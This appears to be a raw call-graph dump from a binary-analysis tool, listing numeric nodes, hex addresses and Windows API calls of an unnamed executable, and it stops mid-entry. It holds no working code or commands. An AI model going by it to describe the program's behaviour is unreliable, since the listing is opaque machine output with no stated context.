39259->39248 39263 41443e 39260->39263 39262 414866 39262->39251 39264 41444b 39263->39264 39265 414451 39264->39265 39266 4144a3 GetPrivateProfileStringW 39264->39266 39267 414491 39265->39267 39268 414455 wcschr 39265->39268 39266->39262 39270 414495 WritePrivateProfileStringW 39267->39270 39268->39267 39269 414463 _snwprintf 39268->39269 39269->39270 39270->39262 39271->38645 39273 40b2cc 27 API calls 39272->39273 39274 409615 39273->39274 39275 409d1f 6 API calls 39274->39275 39276 409625 39275->39276 39301 409b98 GetFileAttributesW 39276->39301 39278 409634 39279 409648 39278->39279 39302 4091b8 memset 39278->39302 39281 40b2cc 27 API calls 39279->39281 39283 408801 39279->39283 39282 40965d 39281->39282 39284 409d1f 6 API calls 39282->39284 39283->38648 39283->38692 39285 40966d 39284->39285 39354 409b98 GetFileAttributesW 39285->39354 39287 40967c 39287->39283 39288 409681 39287->39288 39355 409529 72 API calls 39288->39355 39290 409690 39290->39283 39291->38670 39292->38692 39293->38675 39294->38692 39295->38680 39296->38681 39301->39278 39356 40a6e6 WideCharToMultiByte 39302->39356 39304 409202 39357 444432 39304->39357 39307 40b273 27 API calls 39308 409236 39307->39308 39403 438552 39308->39403 39311 409383 39313 40b273 27 API calls 39311->39313 39315 409399 39313->39315 39314 409254 39316 40937b 39314->39316 39424 4253cf 17 API calls 39314->39424 39317 438552 133 API calls 39315->39317 39428 424f26 122 API calls 39316->39428 39336 4093a3 39317->39336 39320 409267 39425 4253cf 17 API calls 39320->39425 39321 4094ff 39432 443d90 39321->39432 39324 4251c4 136 API calls 39324->39336 39325 409273 39426 4253af 17 API calls 39325->39426 39326 409507 39334 40951d 39326->39334 39452 408f2f 77 API calls 39326->39452 39328 4093df 39431 424f26 122 API calls 39328->39431 39330 4253cf 17 API calls 39330->39336 39334->39279 39336->39321 39336->39324 39336->39328 39336->39330 39338 4093e4 39336->39338 39429 4253af 17 API calls 39338->39429 39344 4093ed 39430 4253af 17 API calls 39344->39430 39347 4093f9 39347->39328 39348 409409 memcmp 39347->39348 39348->39328 39349 409421 memcmp 39348->39349 39350 4094a4 memcmp 39349->39350 39351 409435 39349->39351 39350->39328 39353 4094b8 memcpy memcpy 39350->39353 39351->39328 39352 409442 memcpy memcpy memcpy 39351->39352 39352->39328 39353->39328 39354->39287 39355->39290 39356->39304 39453 4438b5 39357->39453 39359 44444c 39365 409215 39359->39365 39467 415a6d 39359->39467 39362 444486 39364 4444b9 memcpy 39362->39364 39402 4444a4 39362->39402 39363 44469e 39363->39365 39367 443d90 110 API calls 39363->39367 39471 415258 39364->39471 39365->39307 39365->39334 39367->39365 39368 444524 39369 444541 39368->39369 39370 44452a 39368->39370 39474 444316 39369->39474 39508 416935 39370->39508 39374 444316 18 API calls 39375 444563 39374->39375 39376 444316 18 API calls 39375->39376 39377 44456f 39376->39377 39378 444316 18 API calls 39377->39378 39379 44457f 39378->39379 39379->39402 39488 432d4e 39379->39488 39382 444316 18 API calls 39383 4445b0 39382->39383 39492 41eed2 39383->39492 39521 4442e6 11 API calls 39402->39521 39522 438460 39403->39522 39405 409240 39405->39311 39406 4251c4 39405->39406 39534 424f07 39406->39534 39408 4251e4 39409 4251f7 39408->39409 39410 4251e8 39408->39410 39542 4250f8 39409->39542 39541 4446ea 11 API calls 39410->39541 39412 4251f2 39412->39314 39414 425209 39417 425249 39414->39417 39420 4250f8 126 API calls 39414->39420 39421 425287 39414->39421 39550 4384e9 134 API calls 39414->39550 39551 424f74 123 API calls 39414->39551 39417->39421 39552 424ff0 13 API calls 39417->39552 39420->39414 39554 415c7d 16 API calls 39421->39554 39422 425266 39422->39421 39553 415be9 memcpy 39422->39553 39424->39320 39425->39325 39428->39311 39429->39344 39430->39347 39431->39321 39433 443da3 39432->39433 39451 443db6 39432->39451 39555 41707a 39433->39555 39435 443da8 39436 443dac 39435->39436 39438 443dbc 39435->39438 39568 4446ea 11 API calls 39436->39568 39560 4300e8 39438->39560 39451->39326 39452->39334 39454 4438d0 39453->39454 39460 4438c9 39453->39460 39455 415378 memcpy memcpy 39454->39455 39456 4438d5 39455->39456 39457 4154e2 10 API calls 39456->39457 39458 443906 39456->39458 39456->39460 39457->39458 39459 443970 memset 39458->39459 39458->39460 39462 44398b 39459->39462 39460->39359 39461 415700 10 API calls 39464 4439c0 39461->39464 39463 41975c 10 API calls 39462->39463 39465 4439a0 39462->39465 39463->39465 39464->39460 39466 418981 10 API calls 39464->39466 39465->39460 39465->39461 39466->39460 39468 415a77 39467->39468 39469 415a8d 39468->39469 39470 415a7e memset 39468->39470 39469->39362 39470->39469 39472 4438b5 11 API calls 39471->39472 39473 41525d 39472->39473 39473->39368 39475 444328 39474->39475 39476 444423 39475->39476 39477 44434e 39475->39477 39478 4446ea 11 API calls 39476->39478 39479 432d4e memset memset memcpy 39477->39479 39485 444381 39478->39485 39480 44435a 39479->39480 39482 444375 39480->39482 39487 44438b 39480->39487 39481 432d4e memset memset memcpy 39483 4443ec 39481->39483 39484 416935 16 API calls 39482->39484 39483->39485 39486 416935 16 API calls 39483->39486 39484->39485 39485->39374 39486->39485 39487->39481 39489 432d58 39488->39489 39491 432d65 39488->39491 39490 432cc4 memset memset memcpy 39489->39490 39490->39491 39491->39382 39509 41693e 39508->39509 39512 41698e 39508->39512 39510 41694c 39509->39510 39511 422fd1 memset 39509->39511 39510->39512 39513 4165a0 11 API calls 39510->39513 39511->39510 39512->39402 39514 416972 39513->39514 39514->39512 39515 422b84 15 API calls 39514->39515 39515->39512 39521->39363 39523 41703f 11 API calls 39522->39523 39524 43847a 39523->39524 39525 43848a 39524->39525 39526 43847e 39524->39526 39528 438270 133 API calls 39525->39528 39527 4446ea 11 API calls 39526->39527 39530 438488 39527->39530 39529 4384aa 39528->39529 39529->39530 39531 424f26 122 API calls 39529->39531 39530->39405 39532 4384bb 39531->39532 39533 438270 133 API calls 39532->39533 39533->39530 39535 424f1f 39534->39535 39536 424f0c 39534->39536 39538 424eea 11 API calls 39535->39538 39537 416760 11 API calls 39536->39537 39539 424f18 39537->39539 39540 424f24 39538->39540 39539->39408 39540->39408 39541->39412 39543 425108 39542->39543 39549 42510d 39542->39549 39544 424f74 123 API calls 39543->39544 39544->39549 39545 42569b 124 API calls 39546 42516e 39545->39546 39548 415c7d 16 API calls 39546->39548 39547 425115 39547->39414 39548->39547 39549->39545 39549->39547 39550->39414 39551->39414 39552->39422 39553->39421 39554->39412 39556 417085 39555->39556 39557 4170ab 39555->39557 39556->39557 39558 416760 11 API calls 39556->39558 39557->39435 39559 4170a4 39558->39559 39559->39435 39561 430128 39560->39561 39564 4300fa 39560->39564 39563 430196 memset 39561->39563 39562 432f8c memset 39562->39564 39567 4301de 39563->39567 39564->39561 39564->39562 39564->39567 39568->39451 39598 413f4f 39571->39598 39574 413f37 K32GetModuleFileNameExW 39575 413f4a 39574->39575 39575->38708 39577 41396c wcschr 39576->39577 39579 413969 wcscpy 39576->39579 39577->39579 39580 41398e 39577->39580 39581 413a3a 39579->39581 39603 4097f7 wcslen wcslen _memicmp 39580->39603 39581->38708 39583 41399a 39584 4139a4 memset 39583->39584 39585 4139e6 39583->39585 39604 409dd5 GetWindowsDirectoryW wcscpy 39584->39604 39587 413a31 wcscpy 39585->39587 39588 4139ec memset 39585->39588 39587->39581 39605 409dd5 GetWindowsDirectoryW wcscpy 39588->39605 39589 4139c9 wcscpy wcscat 39589->39581 39591 413a11 memcpy wcscat 39591->39581 39593 413cb0 GetModuleHandleW 39592->39593 39594 413cda 39592->39594 39593->39594 39595 413cbf GetProcAddress 39593->39595 39596 413ce3 GetProcessTimes 39594->39596 39597 413cf6 39594->39597 39595->39594 39596->38710 39597->38710 39599 413f2f 39598->39599 39600 413f54 39598->39600 39599->39574 39599->39575 39601 40a804 8 API calls 39600->39601 39602 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39601->39602 39602->39599 39603->39583 39604->39589 39605->39591 39606->38731 39607->38753 39609 409cf9 GetVersionExW 39608->39609 39610 409d0a 39608->39610 39609->39610 39610->38760 39610->38763 39611->38767 39612->38769 39613->38835 39615 40bba5 39614->39615 39662 40cc26 39615->39662 39618 40bd4b 39683 40cc0c 39618->39683 39623 40b2cc 27 API calls 39624 40bbef 39623->39624 39690 40ccf0 _wcsicmp 39624->39690 39626 40bbf5 39626->39618 39691 40ccb4 6 API calls 39626->39691 39628 40bc26 39629 40cf04 17 API calls 39628->39629 39630 40bc2e 39629->39630 39631 40bd43 39630->39631 39632 40b2cc 27 API calls 39630->39632 39633 40cc0c 4 API calls 39631->39633 39634 40bc40 39632->39634 39633->39618 39692 40ccf0 _wcsicmp 39634->39692 39636 40bc46 39636->39631 39637 40bc61 memset memset WideCharToMultiByte 39636->39637 39693 40103c strlen 39637->39693 39639 40bcc0 39640 40b273 27 API calls 39639->39640 39641 40bcd0 memcmp 39640->39641 39641->39631 39642 40bce2 39641->39642 39643 404423 37 API calls 39642->39643 39644 40bd10 39643->39644 39644->39631 39645 40bd3a LocalFree 39644->39645 39646 40bd1f memcpy 39644->39646 39645->39631 39646->39645 39647->38850 39649 409a74 GetTempFileNameW 39648->39649 39650 409a66 GetWindowsDirectoryW 39648->39650 39649->38848 39650->39649 39651->38885 39652->38885 39653->38885 39654->38885 39655->38885 39656->38885 39657->38885 39658->38885 39659->38885 39660->38860 39661->38882 39694 4096c3 CreateFileW 39662->39694 39664 40cc34 39665 40cc3d GetFileSize 39664->39665 39666 40bbca 39664->39666 39667 40afcf 2 API calls 39665->39667 39666->39618 39674 40cf04 39666->39674 39668 40cc64 39667->39668 39695 40a2ef ReadFile 39668->39695 39670 40cc71 39696 40ab4a MultiByteToWideChar 39670->39696 39672 40cc95 CloseHandle 39673 40b04b ??3@YAXPAX 39672->39673 39673->39666 39675 40b633 free 39674->39675 39676 40cf14 39675->39676 39702 40b1ab free free 39676->39702 39678 40bbdd 39678->39618 39678->39623 39679 40cf1b 39679->39678 39681 40cfef 39679->39681 39703 40cd4b 39679->39703 39682 40cd4b 14 API calls 39681->39682 39682->39678 39684 40b633 free 39683->39684 39685 40cc15 39684->39685 39686 40aa04 free 39685->39686 39687 40cc1d 39686->39687 39752 40b1ab free free 39687->39752 39689 40b7d4 memset CreateFileW 39689->38841 39689->38842 39690->39626 39691->39628 39692->39636 39693->39639 39694->39664 39695->39670 39697 40ab6b 39696->39697 39701 40ab93 39696->39701 39698 40a9ce 4 API calls 39697->39698 39699 40ab74 39698->39699 39700 40ab7c MultiByteToWideChar 39699->39700 39700->39701 39701->39672 39702->39679 39704 40cd7b 39703->39704 39737 40aa29 39704->39737 39706 40cef5 39707 40aa04 free 39706->39707 39708 40cefd 39707->39708 39708->39679 39710 40aa29 6 API calls 39711 40ce1d 39710->39711 39712 40aa29 6 API calls 39711->39712 39713 40ce3e 39712->39713 39714 40ce6a 39713->39714 39745 40abb7 wcslen memmove 39713->39745 39715 40ce9f 39714->39715 39748 40abb7 wcslen memmove 39714->39748 39718 40a8d0 7 API calls 39715->39718 39721 40ceb5 39718->39721 39719 40ce56 39746 40aa71 wcslen 39719->39746 39720 40ce8b 39749 40aa71 wcslen 39720->39749 39727 40a8d0 7 API calls 39721->39727 39724 40ce5e 39747 40abb7 wcslen memmove 39724->39747 39725 40ce93 39750 40abb7 wcslen memmove 39725->39750 39729 40cecb 39727->39729 39751 40d00b malloc memcpy free free 39729->39751 39731 40cedd 39732 40aa04 free 39731->39732 39733 40cee5 39732->39733 39734 40aa04 free 39733->39734 39735 40ceed 39734->39735 39736 40aa04 free 39735->39736 39736->39706 39738 40aa33 39737->39738 39744 40aa63 39737->39744 39739 40aa44 39738->39739 39740 40aa38 wcslen 39738->39740 39741 40a9ce malloc memcpy free free 39739->39741 39740->39739 39742 40aa4d 39741->39742 39743 40aa51 memcpy 39742->39743 39742->39744 39743->39744 39744->39706 39744->39710 39745->39719 39746->39724 39747->39714 39748->39720 39749->39725 39750->39715 39751->39731 39752->39689 39753->38900 39754->38908 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39764 4148b6 FindResourceW 39765 4148cf SizeofResource 39764->39765 39768 4148f9 39764->39768 39766 4148e0 LoadResource 39765->39766 39765->39768 39767 4148ee LockResource 39766->39767 39766->39768 39767->39768 37851 415304 free 39769 441b3f 39779 43a9f6 39769->39779 39771 441b61 39952 4386af memset 39771->39952 39773 44189a 39774 4418e2 39773->39774 39776 442bd4 39773->39776 39775 4418ea 39774->39775 39953 4414a9 12 API calls 39774->39953 39776->39775 39954 441409 memset 39776->39954 39780 43aa20 39779->39780 39781 43aadf 39779->39781 39780->39781 39782 43aa34 memset 39780->39782 39781->39771 39783 43aa56 39782->39783 39784 43aa4d 39782->39784 39955 43a6e7 39783->39955 39963 42c02e memset 39784->39963 39789 43aad3 39965 4169a7 11 API calls 39789->39965 39790 43aaae 39790->39781 39790->39789 39805 43aae5 39790->39805 39791 43ac18 39794 43ac47 39791->39794 39967 42bbd5 memcpy memcpy memcpy memset memcpy 39791->39967 39795 43aca8 39794->39795 39968 438eed 16 API calls 39794->39968 39798 43acd5 39795->39798 39970 4233ae 11 API calls 39795->39970 39971 423426 11 API calls 39798->39971 39799 43ac87 39969 4233c5 16 API calls 39799->39969 39803 43ace1 39972 439811 162 API calls 39803->39972 39804 43a9f6 160 API calls 39804->39805 39805->39781 39805->39791 39805->39804 39966 439bbb 22 API calls 39805->39966 39807 43acfd 39812 43ad2c 39807->39812 39973 438eed 16 API calls 39807->39973 39809 43ad19 39974 4233c5 16 API calls 39809->39974 39810 43ad58 39975 44081d 162 API calls 39810->39975 39812->39810 39816 43add9 39812->39816 39815 43ae3a memset 39817 43ae73 39815->39817 39816->39816 39979 423426 11 API calls 39816->39979 39980 42e1c0 146 API calls 39817->39980 39818 43adab 39977 438c4e 162 API calls 39818->39977 39821 43ad6c 39821->39781 39821->39818 39976 42370b memset memcpy memset 39821->39976 39823 43adcc 39978 440f84 12 API calls 39823->39978 39824 43ae96 39981 42e1c0 146 API calls 39824->39981 39827 43aea8 39828 43aec1 39827->39828 39982 42e199 146 API calls 39827->39982 39829 43af00 39828->39829 39983 42e1c0 146 API calls 39828->39983 39829->39781 39833 43af1a 39829->39833 39834 43b3d9 39829->39834 39984 438eed 16 API calls 39833->39984 39840 43b3f6 39834->39840 39842 43b4c8 39834->39842 39836 43b60f 39836->39781 40043 4393a5 17 API calls 39836->40043 39838 43af2f 39985 4233c5 16 API calls 39838->39985 40025 432878 12 API calls 39840->40025 39841 43af51 39986 423426 11 API calls 39841->39986 39844 43b4f2 39842->39844 40031 42bbd5 memcpy memcpy memcpy memset memcpy 39842->40031 40032 43a76c 21 API calls 39844->40032 39846 43af7d 39987 423426 11 API calls 39846->39987 39850 43b529 40033 44081d 162 API calls 39850->40033 39851 43b462 40027 423330 11 API calls 39851->40027 39852 43af94 39988 423330 11 API calls 39852->39988 39856 43afca 39989 423330 11 API calls 39856->39989 39857 43b47e 39861 43b497 39857->39861 40028 42374a memcpy memset memcpy memcpy memcpy 39857->40028 39858 43b544 39862 43b55c 39858->39862 40034 42c02e memset 39858->40034 39859 43b428 39859->39851 40026 432b60 16 API calls 39859->40026 40029 4233ae 11 API calls 39861->40029 40035 43a87a 162 API calls 39862->40035 39863 43afdb 39990 4233ae 11 API calls 39863->39990 39869 43b56c 39872 43b58a 39869->39872 40036 423330 11 API calls 39869->40036 39870 43b4b1 40030 423399 11 API calls 39870->40030 39871 43afee 39991 44081d 162 API calls 39871->39991 40037 440f84 12 API calls 39872->40037 39874 43b4c1 40039 42db80 162 API calls 39874->40039 39879 43b592 40038 43a82f 16 API calls 39879->40038 39882 43b5b4 40040 438c4e 162 API calls 39882->40040 39884 43b5cf 40041 42c02e memset 39884->40041 39886 43b005 39886->39781 39890 43b01f 39886->39890 39992 42d836 162 API calls 39886->39992 39887 43b1ef 40002 4233c5 16 API calls 39887->40002 39890->39887 40000 423330 11 API calls 39890->40000 40001 42d71d 162 API calls 39890->40001 39891 43b212 40003 423330 11 API calls 39891->40003 39892 43b087 39993 4233ae 11 API calls 39892->39993 39893 43add4 39893->39836 40042 438f86 16 API calls 39893->40042 39897 43b22a 40004 42ccb5 11 API calls 39897->40004 39900 43b23f 40005 4233ae 11 API calls 39900->40005 39901 43b10f 39996 423330 11 API calls 39901->39996 39903 43b257 40006 4233ae 11 API calls 39903->40006 39907 43b129 39997 4233ae 11 API calls 39907->39997 39908 43b26e 40007 4233ae 11 API calls 39908->40007 39911 43b09a 39911->39901 39994 42cc15 19 API calls 39911->39994 39995 4233ae 11 API calls 39911->39995 39912 43b282 40008 43a87a 162 API calls 39912->40008 39914 43b13c 39998 440f84 12 API calls 39914->39998 39916 43b29d 40009 423330 11 API calls 39916->40009 39919 43b15f 39999 4233ae 11 API calls 39919->39999 39920 43b2af 39922 43b2b8 39920->39922 39923 43b2ce 39920->39923 40010 4233ae 11 API calls 39922->40010 40011 440f84 12 API calls 39923->40011 39926 43b2c9 40013 4233ae 11 API calls 39926->40013 39927 43b2da 40012 42370b memset memcpy memset 39927->40012 39930 43b2f9 40014 423330 11 API calls 39930->40014 39932 43b30b 40015 423330 11 API calls 39932->40015 39934 43b325 40016 423399 11 API calls 39934->40016 39936 43b332 40017 4233ae 11 API calls 39936->40017 39938 43b354 40018 423399 11 API calls 39938->40018 39940 43b364 40019 43a82f 16 API calls 39940->40019 39942 43b370 40020 42db80 162 API calls 39942->40020 39944 43b380 40021 438c4e 162 API calls 39944->40021 39946 43b39e 40022 423399 11 API calls 39946->40022 39948 43b3ae 40023 43a76c 21 API calls 39948->40023 39950 43b3c3 40024 423399 11 API calls 39950->40024 39952->39773 39953->39775 39954->39776 39956 43a6f5 39955->39956 39957 43a765 39955->39957 39956->39957 40044 42a115 39956->40044 39957->39781 39964 4397fd memset 39957->39964 39961 43a73d 39961->39957 39962 42a115 146 API calls 39961->39962 39962->39957 39963->39783 39964->39790 39965->39781 39966->39805 39967->39794 39968->39799 39969->39795 39970->39798 39971->39803 39972->39807 39973->39809 39974->39812 39975->39821 39976->39818 39977->39823 39978->39893 39979->39815 39980->39824 39981->39827 39982->39828 39983->39828 39984->39838 39985->39841 39986->39846 39987->39852 39988->39856 39989->39863 39990->39871 39991->39886 39992->39892 39993->39911 39994->39911 39995->39911 39996->39907 39997->39914 39998->39919 39999->39890 40000->39890 40001->39890 40002->39891 40003->39897 40004->39900 40005->39903 40006->39908 40007->39912 40008->39916 40009->39920 40010->39926 40011->39927 40012->39926 40013->39930 40014->39932 40015->39934 40016->39936 40017->39938 40018->39940 40019->39942 40020->39944 40021->39946 40022->39948 40023->39950 40024->39893 40025->39859 40026->39851 40027->39857 40028->39861 40029->39870 40030->39874 40031->39844 40032->39850 40033->39858 40034->39862 40035->39869 40036->39872 40037->39879 40038->39874 40039->39882 40040->39884 40041->39893 40042->39836 40043->39781 40045 42a175 40044->40045 40047 42a122 40044->40047 40045->39957 40050 42b13b 146 API calls 40045->40050 40047->40045 40048 42a115 146 API calls 40047->40048 40051 43a174 40047->40051 40075 42a0a8 146 API calls 40047->40075 40048->40047 40050->39961 40065 43a196 40051->40065 40066 43a19e 40051->40066 40052 43a306 40052->40065 40095 4388c4 14 API calls 40052->40095 40055 42a115 146 API calls 40055->40066 40057 43a642 40057->40065 40099 4169a7 11 API calls 40057->40099 40061 43a635 40098 42c02e memset 40061->40098 40065->40047 40066->40052 40066->40055 40066->40065 40076 42ff8c 40066->40076 40084 415a91 40066->40084 40088 4165ff 40066->40088 40091 439504 13 API calls 40066->40091 40092 4312d0 146 API calls 40066->40092 40093 42be4c memcpy memcpy memcpy memset memcpy 40066->40093 40094 43a121 11 API calls 40066->40094 40068 42bf4c 14 API calls 40070 43a325 40068->40070 40069 4169a7 11 API calls 40069->40070 40070->40057 40070->40061 40070->40065 40070->40068 40070->40069 40071 42b5b5 memset memcpy 40070->40071 40074 4165ff 11 API calls 40070->40074 40096 42b63e 14 API calls 40070->40096 40097 42bfcf memcpy 40070->40097 40071->40070 40074->40070 40075->40047 40100 43817e 40076->40100 40078 42ff9d 40078->40066 40079 42ff99 40079->40078 40080 42ffe3 40079->40080 40081 42ffd0 40079->40081 40105 4169a7 11 API calls 40080->40105 40104 4169a7 11 API calls 40081->40104 40085 415a9d 40084->40085 40086 415ab3 40085->40086 40087 415aa4 memset 40085->40087 40086->40066 40087->40086 40254 4165a0 40088->40254 40091->40066 40092->40066 40093->40066 40094->40066 40095->40070 40096->40070 40097->40070 40098->40057 40099->40065 40101 438187 40100->40101 40103 438192 40100->40103 40106 4380f6 40101->40106 40103->40079 40104->40078 40105->40078 40108 43811f 40106->40108 40107 438164 40107->40103 40108->40107 40110 4300e8 3 API calls 40108->40110 40111 437e5e 40108->40111 40110->40108 40134 437d3c 40111->40134 40113 437eb3 40113->40108 40114 437ea9 40114->40113 40120 437f22 40114->40120 40149 41f432 40114->40149 40117 437f06 40196 415c56 11 API calls 40117->40196 40118 437f7f 40121 437f95 40118->40121 40124 43802b 40118->40124 40120->40118 40122 432d4e 3 API calls 40120->40122 40197 415c56 11 API calls 40121->40197 40122->40118 40125 4165ff 11 API calls 40124->40125 40126 438054 40125->40126 40160 437371 40126->40160 40129 43806b 40130 438094 40129->40130 40198 42f50e 137 API calls 40129->40198 40132 437fa3 40130->40132 40133 4300e8 3 API calls 40130->40133 40132->40113 40199 41f638 103 API calls 40132->40199 40133->40132 40135 437d69 40134->40135 40138 437d80 40134->40138 40200 437ccb 11 API calls 40135->40200 40137 437d76 40137->40114 40138->40137 40139 437da3 40138->40139 40140 437d90 40138->40140 40142 438460 133 API calls 40139->40142 40140->40137 40204 437ccb 11 API calls 40140->40204 40145 437dcb 40142->40145 40143 437de8 40203 424f26 122 API calls 40143->40203 40145->40143 40201 444283 13 API calls 40145->40201 40147 437dfc 40202 437ccb 11 API calls 40147->40202 40150 41f54d 40149->40150 40156 41f44f 40149->40156 40151 41f466 40150->40151 40234 41c635 memset memset 40150->40234 40151->40117 40151->40120 40156->40151 40158 41f50b 40156->40158 40205 41f1a5 40156->40205 40230 41c06f memcmp 40156->40230 40231 41f3b1 89 API calls 40156->40231 40232 41f398 85 API calls 40156->40232 40158->40150 40158->40151 40233 41c295 85 API calls 40158->40233 40235 41703f 40160->40235 40162 437399 40163 43739d 40162->40163 40165 4373ac 40162->40165 40242 4446ea 11 API calls 40163->40242 40166 416935 16 API calls 40165->40166 40167 4373ca 40166->40167 40169 438460 133 API calls 40167->40169 40173 4251c4 136 API calls 40167->40173 40177 415a91 memset 40167->40177 40180 43758f 40167->40180 40192 437584 40167->40192 40195 437d3c 134 API calls 40167->40195 40243 425433 13 API calls 40167->40243 40244 425413 17 API calls 40167->40244 40245 42533e 16 API calls 40167->40245 40246 42538f 16 API calls 40167->40246 40247 42453e 122 API calls 40167->40247 40168 4375bc 40250 415c7d 16 API calls 40168->40250 40169->40167 40172 4375d2 40194 4373a7 40172->40194 40251 4442e6 11 API calls 40172->40251 40173->40167 40175 4375e2 40175->40194 40252 444283 13 API calls 40175->40252 40177->40167 40248 42453e 122 API calls 40180->40248 40181 4375f4 40186 437620 40181->40186 40187 43760b 40181->40187 40185 43759f 40188 416935 16 API calls 40185->40188 40190 416935 16 API calls 40186->40190 40253 444283 13 API calls 40187->40253 40188->40192 40190->40194 40192->40168 40249 42453e 122 API calls 40192->40249 40193 437612 memcpy 40193->40194 40194->40129 40195->40167 40196->40113 40197->40132 40198->40130 40199->40113 40200->40137 40201->40147 40202->40143 40203->40137 40204->40137 40206 41bc3b 100 API calls 40205->40206 40207 41f1b4 40206->40207 40208 41edad 85 API calls 40207->40208 40215 41f282 40207->40215 40209 41f1cb 40208->40209 40210 41f1f5 memcmp 40209->40210 40211 41f20e 40209->40211 40209->40215 40210->40211 40212 41f21b memcmp 40211->40212 40211->40215 40213 41f326 40212->40213 40216 41f23d 40212->40216 40214 41ee6b 85 API calls 40213->40214 40213->40215 40214->40215 40215->40156 40216->40213 40217 41f28e memcmp 40216->40217 40219 41c8df 55 API calls 40216->40219 40217->40213 40218 41f2a9 40217->40218 40218->40213 40221 41f308 40218->40221 40222 41f2d8 40218->40222 40220 41f269 40219->40220 40220->40213 40223 41f287 40220->40223 40224 41f27a 40220->40224 40221->40213 40228 4446ce 11 API calls 40221->40228 40225 41ee6b 85 API calls 40222->40225 40223->40217 40226 41ee6b 85 API calls 40224->40226 40227 41f2e0 40225->40227 40226->40215 40229 41b1ca memset 40227->40229 40228->40213 40229->40215 40230->40156 40231->40156 40232->40156 40233->40150 40234->40151 40236 417044 40235->40236 40237 41705c 40235->40237 40239 416760 11 API calls 40236->40239 40241 417055 40236->40241 40238 417075 40237->40238 40240 41707a 11 API calls 40237->40240 40238->40162 40239->40241 40240->40236 40241->40162 40242->40194 40243->40167 40244->40167 40245->40167 40246->40167 40247->40167 40248->40185 40249->40168 40250->40172 40251->40175 40252->40181 40253->40193 40259 415cfe 40254->40259 40263 415d23 __aullrem __aulldvrm 40259->40263 40266 41628e 40259->40266 40260 4163ca 40273 416422 11 API calls 40260->40273 40262 416172 memset 40262->40263 40263->40260 40263->40262 40264 416422 10 API calls 40263->40264 40265 415cb9 10 API calls 40263->40265 40263->40266 40264->40263 40265->40263 40267 416520 40266->40267 40268 416527 40267->40268 40272 416574 40267->40272 40270 416544 40268->40270 40268->40272 40274 4156aa 11 API calls 40268->40274 40271 416561 memcpy 40270->40271 40270->40272 40271->40272 40272->40066 40273->40266 40274->40270 40296 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 